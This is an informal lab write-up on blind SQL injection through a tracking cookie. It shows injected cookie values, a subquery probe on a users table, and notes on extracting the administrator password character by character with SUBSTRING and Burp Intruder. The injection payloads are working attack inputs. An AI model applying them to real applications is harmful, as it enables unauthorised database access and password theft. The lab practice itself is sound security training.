SQL injection labs

Lab: Blind SQL injection with conditional responses

The application uses a tracking cookie for analytics

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

Cookie: TrackingId=St10uonYH4szuC66

Cookie: TrackingId=St10uonYH4szuC66' AND '1'='1 #true
Cookie: TrackingId=St10uonYH4szuC66' AND '1'='2  #false

ok i will use limit

' AND (SELECT 'X' from users limit 1)='x'--
Welcome back!

ok i will try use table users and column username

ok in this case i'll tracking passsword using SUBSTRING() function to extract a single character from the password

i will try numbers 1 to 19 all valid password >19

go to intruder > cluster bomb

offfffffffffffffffffffffff! 😄 🎉

Last updated